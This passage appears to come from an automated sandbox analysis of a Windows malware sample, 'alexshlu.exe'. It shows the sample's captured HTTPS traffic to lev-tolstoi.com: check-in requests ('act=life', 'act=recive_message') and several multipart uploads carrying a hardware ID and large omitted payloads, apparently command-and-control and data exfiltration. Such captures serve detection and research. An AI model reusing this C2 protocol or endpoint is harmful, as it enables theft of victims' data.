Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-18 11:08:06 UTC | 10545 | IN | Data Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.8  49707        172.67.157.254  443               7720  C:\Users\user\Desktop\alexshlu.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-18 11:08:08 UTC  262                OUT        POST /api HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Content-Type: application/x-www-form-urlencoded
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                       Content-Length: 8
                                                       Host: lev-tolstoi.com
2024-12-18 11:08:08 UTC  8                  OUT        Data Raw: 61 63 74 3d 6c 69 66 65
                                                       Data Ascii: act=life
2024-12-18 11:08:11 UTC  1039               IN         HTTP/1.1 200 OK
                                                       Date: Wed, 18 Dec 2024 11:08:11 GMT
                                                       Content-Type: text/html; charset=UTF-8
                                                       Transfer-Encoding: chunked
                                                       Connection: close
                                                       Set-Cookie: PHPSESSID=6h1dpvi0q93fltpo490276grf0; expires=Sun, 13-Apr-2025 04:54:48 GMT; Max-Age=9999999; path=/
                                                       Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                       Cache-Control: no-store, no-cache, must-revalidate
                                                       Pragma: no-cache
                                                       cf-cache-status: DYNAMIC
                                                       vary: accept-encoding
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mRi2uk9wWhy2znQAvV8uBZDBTOnT2foqqYhKB9eMlZIiOJYhP6jOZGZcxXJolnq%2BMXPR9WCqfO%2Bj0tpk65KHCDig51VDd89BQRQXAauCd%2BfWAq9yqtHT%2B8fLj%2Fksyj9BYzA%3D"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 8f3eb17b5c1a7ca6-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=2054&min_rtt=2042&rtt_var=790&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1363211&cwnd=236&unsent_bytes=0&cid=3e62297cf3b4f895&ts=3034&x=0"
2024-12-18 11:08:11 UTC  7                  IN         Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                       Data Ascii: 2ok
2024-12-18 11:08:11 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                       Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.8  49708        172.67.157.254  443               7720  C:\Users\user\Desktop\alexshlu.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-18 11:08:12 UTC  263                OUT        POST /api HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Content-Type: application/x-www-form-urlencoded
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                       Content-Length: 50
                                                       Host: lev-tolstoi.com
2024-12-18 11:08:12 UTC  50                 OUT        Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 6e 6f 76 65 6d 62 65 72 26 6a 3d
                                                       Data Ascii: act=recive_message&ver=4.0&lid=FATE99--november&j=
2024-12-18 11:08:16 UTC  1029               IN         HTTP/1.1 200 OK
                                                       Date: Wed, 18 Dec 2024 11:08:16 GMT
                                                       Content-Type: text/html; charset=UTF-8
                                                       Transfer-Encoding: chunked
                                                       Connection: close
                                                       Set-Cookie: PHPSESSID=k80u0a1vofcsbef2j4vh3khctg; expires=Sun, 13-Apr-2025 04:54:53 GMT; Max-Age=9999999; path=/
                                                       Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                       Cache-Control: no-store, no-cache, must-revalidate
                                                       Pragma: no-cache
                                                       cf-cache-status: DYNAMIC
                                                       vary: accept-encoding
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vie4uMlTwmzetcHhjN2pJBa4H4lNMWMs8N339dyVnitLLeAQgNJBozKKobwB8u7GLMCR1JJyktA8wbV4ygb8Ddp3o7dEBC9Fbru1eWNC39e5y1OKw5AdkYLEvNgjPoqmSSI%3D"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 8f3eb196894f8c87-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=2078&min_rtt=2018&rtt_var=800&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=949&delivery_rate=1446977&cwnd=214&unsent_bytes=0&cid=3e04554df55ffac2&ts=3700&x=0"
2024-12-18 11:08:16 UTC  340                IN         Data Raw: 32 64 63 61 0d 0a 6f 4a 57 67 76 48 6a 55 4f 49 6c 6d 76 71 75 36 4c 36 50 4f 71 66 7a 4f 58 6f 53 6b 48 4a 4c 69 37 48 6a 54 73 74 76 70 72 6d 33 62 74 39 61 65 51 75 41 55 71 78 58 62 69 59 42 62 30 62 76 4d 30 4f 77 2f 34 49 59 6d 39 49 4f 41 43 37 61 65 2b 5a 2f 44 54 35 72 7a 77 64 41 4c 73 52 53 72 41 38 61 4a 67 48 54 59 37 4d 79 53 37 47 53 6d 77 58 62 77 67 34 41 61 73 74 6d 30 6d 63 49 4f 79 50 6e 48 31 42 32 33 58 4f 67 4b 30 38 37 66 53 73 4b 6b 78 35 57 6a 4e 75 6d 47 4d 4c 43 48 6c 6c 72 70 6b 4a 61 4d 32 67 7a 74 39 4e 50 58 57 71 6b 55 38 6b 54 62 78 5a 67 56 67 61 2f 4d 6e 71 49 34 34 4d 39 30 2b 6f 71 49 47 37 66 59 71 34 44 49 42 63 6a 33 78 4e 55 58 76 6b 6a 6c 41 4e 54 46 32 55 44 43 37 49 58 65 71 79 53 6d 6e 6a 36 6a 73 6f 30 4c 6f
                                                       Data Ascii: 2dcaoJWgvHjUOIlmvqu6L6POqfzOXoSkHJLi7HjTstvprm3bt9aeQuAUqxXbiYBb0bvM0Ow/4IYm9IOAC7ae+Z/DT5rzwdALsRSrA8aJgHTY7MyS7GSmwXbwg4Aastm0mcIOyPnH1B23XOgK087fSsKkx5WjNumGMLCHllrpkJaM2gzt9NPXWqkU8kTbxZgVga/MnqI44M90+oqIG7fYq4DIBcj3xNUXvkjlANTF2UDC7IXeqySmnj6jso0Lo
2024-12-18 11:08:16 UTC  1369               IN         Data Raw: 2f 4a 2b 59 7a 41 54 35 71 33 78 4e 41 62 75 31 72 35 44 4e 66 43 33 56 2f 4b 70 63 61 54 72 44 48 73 79 58 33 77 68 34 51 51 76 74 71 39 68 73 45 4a 77 76 65 43 6b 46 71 78 51 71 74 63 6e 4f 72 64 58 63 61 67 33 64 79 57 66 50 6d 49 5a 37 43 48 67 6c 72 70 6b 4c 47 4f 7a 77 7a 4a 2b 4d 48 57 45 61 52 61 2b 51 4c 52 7a 4d 70 4c 78 4b 4c 42 6e 62 34 32 36 4d 42 39 2b 59 75 48 48 37 62 55 2b 63 57 4d 43 4e 71 33 6d 70 34 37 75 31 48 6e 44 73 76 4a 6d 46 4b 50 74 59 75 5a 6f 48 79 2b 68 6e 72 78 68 49 38 65 76 39 36 39 68 38 6f 42 7a 2f 6a 45 31 42 71 78 55 4f 4d 4d 33 63 54 54 51 73 47 70 78 70 71 71 4d 4f 66 44 50 72 37 41 69 51 4c 78 69 50 6d 6c 79 77 7a 51 74 66 66 64 46 4c 68 64 2f 55 54 44 68 38 45 4e 78 71 43 4c 78 75 77 79 34 38 6c 73 38 5a 4b 4c 46
                                                       Data Ascii: /J+YzAT5q3xNAbu1r5DNfC3V/KpcaTrDHsyX3wh4QQvtq9hsEJwveCkFqxQqtcnOrdXcag3dyWfPmIZ7CHglrpkLGOzwzJ+MHWEaRa+QLRzMpLxKLBnb426MB9+YuHH7bU+cWMCNq3mp47u1HnDsvJmFKPtYuZoHy+hnrxhI8ev969h8oBz/jE1BqxUOMM3cTTQsGpxpqqMOfDPr7AiQLxiPmlywzQtffdFLhd/UTDh8ENxqCLxuwy48ls8ZKLF
2024-12-18 11:08:16 UTC  1369               IN         Data Raw: 4c 2f 52 6a 4a 74 66 66 64 46 4c 68 64 2f 55 54 44 68 38 45 4e 78 71 43 4c 78 75 77 78 37 73 4e 37 2f 34 47 45 46 4c 54 61 74 59 50 43 44 4e 44 34 78 74 34 57 76 6c 44 6d 43 74 6a 42 30 55 62 4b 71 73 75 66 70 6e 79 6f 68 6e 6e 6f 77 4e 5a 61 68 64 65 31 68 73 4e 4e 39 2f 54 4d 30 42 32 67 47 76 52 4b 78 59 6e 66 51 59 48 30 69 35 4b 6c 50 4f 33 4d 65 76 43 48 67 78 2b 79 31 37 71 47 79 77 58 4d 38 4d 62 53 45 37 74 63 36 77 50 59 7a 4d 70 49 79 4b 44 48 33 75 4a 38 34 64 34 2b 71 4d 43 68 48 61 66 54 6c 6f 6a 64 42 6f 4c 6f 6a 4d 64 61 73 56 61 72 58 4a 7a 4f 33 55 58 4b 71 73 4f 65 76 6a 6e 6f 7a 58 2f 36 68 6f 38 58 76 64 61 35 69 73 77 4a 7a 76 66 46 32 51 69 6b 58 2b 30 57 31 6f 6d 57 44 63 61 30 69 38 62 73 43 76 62 52 62 2b 62 43 75 78 6d 2f 33 72
                                                       Data Ascii: L/RjJtffdFLhd/UTDh8ENxqCLxuwx7sN7/4GEFLTatYPCDND4xt4WvlDmCtjB0UbKqsufpnyohnnowNZahde1hsNN9/TM0B2gGvRKxYnfQYH0i5KlPO3MevCHgx+y17qGywXM8MbSE7tc6wPYzMpIyKDH3uJ84d4+qMChHafTlojdBoLojMdasVarXJzO3UXKqsOevjnozX/6ho8Xvda5iswJzvfF2QikX+0W1omWDca0i8bsCvbRb+bCuxm/3r
2024-12-18 11:08:16 UTC  1369               IN         Data Raw: 7a 50 48 45 30 78 2b 35 55 50 6b 4d 30 73 54 54 51 73 71 2b 79 35 4f 6f 4d 4f 4c 4f 64 66 72 41 77 46 71 32 79 50 6e 54 6a 44 72 50 2b 4d 4c 64 44 50 5a 46 70 52 32 63 7a 74 51 4e 6d 65 7a 48 6b 4b 77 7a 36 73 70 31 2b 49 47 43 46 4c 62 56 73 49 50 45 48 63 50 7a 79 74 38 55 75 56 76 76 41 64 6e 4e 33 30 6e 48 6f 34 76 51 37 44 76 2b 68 69 61 77 72 36 6b 76 38 2f 47 44 79 39 4e 42 32 37 66 46 30 6c 72 75 47 75 63 48 30 4d 48 58 53 38 69 67 77 5a 65 6e 4d 4f 33 43 63 76 6d 46 69 42 75 30 31 62 69 50 77 41 58 45 39 4d 48 52 46 62 6c 53 71 30 71 63 7a 73 41 4e 6d 65 7a 75 69 61 63 79 34 49 5a 68 76 70 6e 4f 48 62 32 51 34 63 76 41 42 73 54 78 78 39 49 62 73 46 4c 75 44 4e 6a 49 33 6b 76 43 6f 38 2b 62 72 54 50 69 79 6e 44 36 67 59 38 57 75 74 2b 79 6a 6f 78
                                                       Data Ascii: zPHE0x+5UPkM0sTTQsq+y5OoMOLOdfrAwFq2yPnTjDrP+MLdDPZFpR2cztQNmezHkKwz6sp1+IGCFLbVsIPEHcPzyt8UuVvvAdnN30nHo4vQ7Dv+hiawr6kv8/GDy9NB27fF0lruGucH0MHXS8igwZenMO3CcvmFiBu01biPwAXE9MHRFblSq0qczsANmezuiacy4IZhvpnOHb2Q4cvABsTxx9IbsFLuDNjI3kvCo8+brTPiynD6gY8Wut+yjox
2024-12-18 11:08:16 UTC  1369               IN         Data Raw: 4e 45 63 74 31 2f 68 43 4e 76 4d 30 30 4c 4e 37 49 58 65 71 79 53 6d 6e 6a 37 65 69 35 30 4e 73 74 36 79 6e 64 64 50 33 62 6e 62 6e 68 32 36 47 72 4e 45 33 38 4c 54 53 63 47 67 79 35 71 68 50 50 54 4a 65 66 65 4a 68 51 69 37 31 37 36 41 78 41 54 4e 38 64 44 53 46 4b 52 66 2b 52 61 63 68 35 68 4b 32 65 79 54 33 70 6f 37 39 74 5a 39 73 72 47 59 47 61 66 62 74 49 65 4d 45 49 7a 75 67 74 6b 57 39 67 4b 72 41 74 50 41 32 30 4c 41 70 63 65 54 71 54 58 6a 78 33 6a 30 69 6f 51 61 74 39 61 34 6a 73 59 4d 77 2f 33 4c 32 52 4b 78 57 66 6c 45 6b 6f 6e 66 56 59 48 30 69 37 65 72 4c 75 6a 57 50 75 2f 4f 6c 31 71 32 33 50 6e 54 6a 41 76 49 2b 4d 62 5a 46 72 42 66 37 51 6e 64 78 74 6c 4e 7a 71 6a 41 6c 36 6f 39 36 38 4e 7a 39 4a 4b 45 45 62 37 63 73 49 66 42 54 34 79 33
                                                       Data Ascii: NEct1/hCNvM00LN7IXeqySmnj7ei50Nst6ynddP3bnbnh26GrNE38LTScGgy5qhPPTJefeJhQi7176AxATN8dDSFKRf+Rach5hK2eyT3po79tZ9srGYGafbtIeMEIzugtkW9gKrAtPA20LApceTqTXjx3j0ioQat9a4jsYMw/3L2RKxWflEkonfVYH0i7erLujWPu/Ol1q23PnTjAvI+MbZFrBf7QndxtlNzqjAl6o968Nz9JKEEb7csIfBT4y3
2024-12-18 11:08:16 UTC  1369               IN         Data Raw: 56 49 36 67 4c 4f 79 64 56 48 30 36 62 41 6d 36 45 78 36 38 56 34 39 6f 75 43 43 4c 6a 51 75 6f 43 4d 51 59 4c 77 32 70 35 43 39 6e 6e 38 45 74 62 4f 31 46 76 4b 72 63 69 49 6f 53 79 6d 69 44 37 68 68 35 39 61 36 63 61 70 6e 4d 73 51 6a 4f 36 43 32 52 62 32 41 71 73 43 31 63 2f 66 53 38 2b 2b 7a 70 69 6a 4d 2b 2f 50 65 76 69 44 6a 68 36 31 31 37 79 49 77 41 54 46 39 4d 33 61 45 37 68 54 35 45 53 53 69 64 39 56 67 66 53 4c 76 37 63 2f 36 73 73 2b 37 38 36 58 57 72 62 63 2b 64 4f 4d 41 38 7a 79 77 74 51 63 73 6c 2f 74 44 74 6e 4a 30 30 37 4f 71 4d 32 61 6f 7a 7a 74 7a 33 2f 32 68 59 51 52 74 39 32 36 6a 63 70 50 6a 4c 66 46 78 6c 72 75 47 73 73 66 30 63 58 66 44 64 37 69 30 74 36 72 4d 4b 61 65 50 76 75 4d 69 68 32 78 33 62 71 44 79 51 76 49 38 73 4c 57 43
                                                       Data Ascii: VI6gLOydVH06bAm6Ex68V49ouCCLjQuoCMQYLw2p5C9nn8EtbO1FvKrciIoSymiD7hh59a6capnMsQjO6C2Rb2AqsC1c/fS8++zpijM+/PeviDjh6117yIwATF9M3aE7hT5ESSid9VgfSLv7c/6ss+786XWrbc+dOMA8zywtQcsl/tDtnJ007OqM2aozztz3/2hYQRt926jcpPjLfFxlruGssf0cXfDd7i0t6rMKaePvuMih2x3bqDyQvI8sLWC
2024-12-18 11:08:16 UTC  1369               IN         Data Raw: 45 6b 6f 6e 66 57 34 48 30 69 36 44 73 4c 75 58 57 66 66 2b 52 73 46 72 70 79 59 66 4c 78 78 6e 46 35 38 48 49 45 62 74 57 2b 6a 71 63 6b 59 77 66 6b 2f 36 5a 7a 4c 4e 38 2b 66 6b 77 73 49 48 4f 51 6f 6a 4a 2b 5a 32 4d 56 35 43 35 67 73 78 61 37 68 71 73 42 38 37 62 33 6b 37 58 72 34 79 67 6b 68 76 77 7a 48 6e 67 68 35 6b 56 38 5a 37 35 68 49 78 58 2b 37 66 4c 32 51 47 6e 54 4f 59 55 32 34 6e 6e 41 34 47 30 69 38 62 73 43 65 58 49 63 50 65 57 6e 31 65 57 78 72 4f 4d 33 41 6a 56 2b 49 4b 51 57 72 41 61 73 31 65 53 69 64 78 63 67 66 53 62 7a 50 64 70 74 5a 45 75 6f 70 2f 41 41 2f 48 47 2b 64 4f 65 51 59 4c 6c 67 6f 5a 61 38 56 6e 35 46 74 72 4b 7a 6b 36 47 6b 76 57 35 74 6a 48 67 30 57 2f 4f 76 6f 6b 41 76 4e 61 75 6d 6f 41 61 77 66 6e 4d 32 51 7a 32 46 4b
                                                       Data Ascii: EkonfW4H0i6DsLuXWff+RsFrpyYfLxxnF58HIEbtW+jqckYwfk/6ZzLN8+fkwsIHOQojJ+Z2MV5C5gsxa7hqsB87b3k7Xr4ygkhvwzHngh5kV8Z75hIxX+7fL2QGnTOYU24nnA4G0i8bsCeXIcPeWn1eWxrOM3AjV+IKQWrAas1eSidxcgfSbzPdptZEuop/AA/HG+dOeQYLlgoZa8Vn5FtrKzk6GkvW5tjHg0W/OvokAvNaumoAawfnM2Qz2FK
2024-12-18 11:08:16 UTC  1369               IN         Data Raw: 69 41 4f 42 71 4e 72 65 39 47 79 30 6e 53 75 6a 31 39 35 49 72 70 36 67 79 39 70 50 6d 71 57 4d 6e 67 6a 32 41 71 74 44 33 39 76 4b 53 38 4b 36 79 4e 6d 53 41 73 48 49 65 66 47 57 6e 67 32 2b 37 6f 65 65 7a 77 48 4d 38 4e 54 50 57 76 67 61 35 45 53 45 38 4a 67 46 67 5a 4f 46 33 72 52 38 76 6f 5a 4c 38 34 36 41 48 61 66 42 39 4b 7a 43 43 4d 50 68 30 73 6b 56 39 68 53 72 41 70 79 52 69 67 4f 42 71 4e 72 65 39 47 79 30 6e 53 75 6a 31 39 35 49 72 70 36 67 79 39 70 50 6d 71 57 4d 6e 67 6a 32 41 71 74 44 33 39 76 4b 53 38 4b 36 79 4e 6d 53 41 73 48 49 65 66 47 57 6e 67 32 2b 6e 35 65 39 37 54 48 38 34 73 48 51 46 4c 46 4d 2b 6b 53 53 69 64 63 4e 6d 5a 57 4c 31 75 77 44 71 49 5a 6d 73 4e 6a 4f 4c 37 4c 65 74 34 7a 61 48 6f 2f 51 7a 4e 6b 62 6f 45 72 38 43 35 50
                                                       Data Ascii: iAOBqNre9Gy0nSuj195Irp6gy9pPmqWMngj2AqtD39vKS8K6yNmSAsHIefGWng2+7oeezwHM8NTPWvga5ESE8JgFgZOF3rR8voZL846AHafB9KzCCMPh0skV9hSrApyRigOBqNre9Gy0nSuj195Irp6gy9pPmqWMngj2AqtD39vKS8K6yNmSAsHIefGWng2+n5e97TH84sHQFLFM+kSSidcNmZWL1uwDqIZmsNjOL7Let4zaHo/QzNkboEr8C5P
2024-12-18 11:08:16 UTC  1369               IN         Data Raw: 4b 48 50 69 4c 6b 2f 39 73 46 41 7a 71 32 63 48 61 48 54 2b 37 72 61 44 4d 4c 35 78 5a 35 55 39 6b 4b 72 58 4a 7a 6b 79 6b 72 52 72 34 76 51 37 44 43 6d 6e 6a 37 39 6b 6f 6b 4b 73 70 79 2b 6b 63 74 50 33 62 6e 62 6e 67 7a 32 41 72 68 4b 6e 4e 75 59 46 59 48 72 78 5a 4f 74 50 2b 6a 46 62 4f 4b 47 6a 51 79 79 6c 34 65 31 34 52 33 46 35 38 47 63 4b 37 74 65 2f 52 48 66 32 64 39 7a 2f 34 48 5a 6d 62 77 2f 70 4f 70 35 2f 59 79 77 4a 49 62 42 76 70 75 4f 4b 63 48 68 77 5a 35 55 39 6b 4b 72 58 4a 7a 6b 79 6b 72 52 72 34 6d 79 71 7a 48 71 68 6d 47 2b 6d 63 34 4d 38 59 6a 71 78 59 77 64 67 71 2b 43 6d 52 6d 6b 53 4f 30 48 79 73 71 66 63 2f 2b 42 32 5a 6d 38 50 36 54 33 63 2f 53 57 6d 78 6d 68 31 34 65 31 34 52 33 46 35 38 47 63 50 34 77 59 32 68 4c 66 79 64 5a 4b
                                                       Data Ascii: KHPiLk/9sFAzq2cHaHT+7raDML5xZ5U9kKrXJzkykrRr4vQ7DCmnj79kokKspy+kctP3bnbngz2ArhKnNuYFYHrxZOtP+jFbOKGjQyyl4e14R3F58GcK7te/RHf2d9z/4HZmbw/pOp5/YywJIbBvpuOKcHhwZ5U9kKrXJzkykrRr4myqzHqhmG+mc4M8YjqxYwdgq+CmRmkSO0Hysqfc/+B2Zm8P6T3c/SWmxmh14e14R3F58GcP4wY2hLfydZK


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.8  49709        172.67.157.254  443               7720  C:\Users\user\Desktop\alexshlu.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 11:08:18 UTC  280                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=N08MCDNNF0PK0HU2Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12843
Host: lev-tolstoi.com
2024-12-18 11:08:18 UTC  12843              OUT        Data Raw: (hex dump omitted)
Data Ascii: --N08MCDNNF0PK0HU2ZContent-Disposition: form-data; name="hwid"3DEF27CA3EABD68D23D904AF30EFEBBC--N08MCDNNF0PK0HU2ZContent-Disposition: form-data; name="pid"2--N08MCDNNF0PK0HU2ZContent-Disposition: form-data; name="lid"FATE99--november
2024-12-18 11:08:20 UTC  1041               IN         HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 11:08:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=7bbvmtdpgulbfo081ca53llor9; expires=Sun, 13-Apr-2025 04:54:57 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6TJgThN1lgtV8rzYsbOJ3GCSyQ4pubNTZ8flsSoY%2FvPenMG%2BcTJ%2BqBvUMch8Ng3%2F79OIXIAwPcE5boOz3pmlmv5DYZbCccgFKJ5x80hw5UZOQWOhQJrQfZ4H9KWZCneyXrU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3eb1b72b434357-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1893&min_rtt=1886&rtt_var=712&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13781&delivery_rate=1548250&cwnd=175&unsent_bytes=0&cid=c3cf68e63e88850a&ts=2220&x=0"
2024-12-18 11:08:20 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-18 11:08:20 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.8  49712        172.67.157.254  443               7720  C:\Users\user\Desktop\alexshlu.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 11:08:21 UTC  277                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=UZISBZQ0QWSQV5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15054
Host: lev-tolstoi.com
2024-12-18 11:08:21 UTC  15054              OUT        Data Raw: (hex dump omitted)
Data Ascii: --UZISBZQ0QWSQV5Content-Disposition: form-data; name="hwid"3DEF27CA3EABD68D23D904AF30EFEBBC--UZISBZQ0QWSQV5Content-Disposition: form-data; name="pid"2--UZISBZQ0QWSQV5Content-Disposition: form-data; name="lid"FATE99--november--UZISB
2024-12-18 11:08:24 UTC  1039               IN         HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 11:08:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=4ii1o324dhdn1t530ksftg29na; expires=Sun, 13-Apr-2025 04:55:02 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ky6ggzs82g7SnlGmYKBkwqCkqf4wiEUCZi14wpCJf7Ut5RZnT4dyN%2FQdXOJpMJyC7wkQUiuewPICEL%2BDJjudnN7lWdN%2FVy3z8y0uJT8PrGEYGwsIe6TNVQztX26WQLQaVjk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3eb1cd9ca07cb1-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1947&min_rtt=1941&rtt_var=740&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2834&recv_bytes=15989&delivery_rate=1466599&cwnd=235&unsent_bytes=0&cid=c5ddf0580831ae79&ts=2765&x=0"
2024-12-18 11:08:24 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-18 11:08:24 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.8  49713        172.67.157.254  443               7720  C:\Users\user\Desktop\alexshlu.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-18 11:08:26 UTC  279                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=DBZLQE7OO4ZHJHDX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20233
Host: lev-tolstoi.com
2024-12-18 11:08:26 UTC  15331              OUT        Data Raw: (hex dump omitted)
Data Ascii: --DBZLQE7OO4ZHJHDXContent-Disposition: form-data; name="hwid"3DEF27CA3EABD68D23D904AF30EFEBBC--DBZLQE7OO4ZHJHDXContent-Disposition: form-data; name="pid"3--DBZLQE7OO4ZHJHDXContent-Disposition: form-data; name="lid"FATE99--november-
2024-12-18 11:08:26 UTC  4902               OUT        Data Raw: (binary dump omitted)
2024-12-18 11:08:30 UTC  1035               IN         HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 11:08:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=l5natqrdk8i5hd03egnjmdnga8; expires=Sun, 13-Apr-2025 04:55:05 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zXLVvY5ZxJLfyMqsPHWKiMdYp30TF%2BuJ0cDxddP6PB2p5OiIL12IUDEDGnupr2xi0YNKIludmruhrFBPCRLoAOLvqPVFiEoyibBvbqw090ZUPmXPMshETvCT6iHwTLDKC7Q%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3eb1e88cc47285-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1969&rtt_var=744&sent=16&recv=25&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21192&delivery_rate=1466599&cwnd=249&unsent_bytes=0&cid=a788fc27a1aec6eb&ts=4376&x=0"
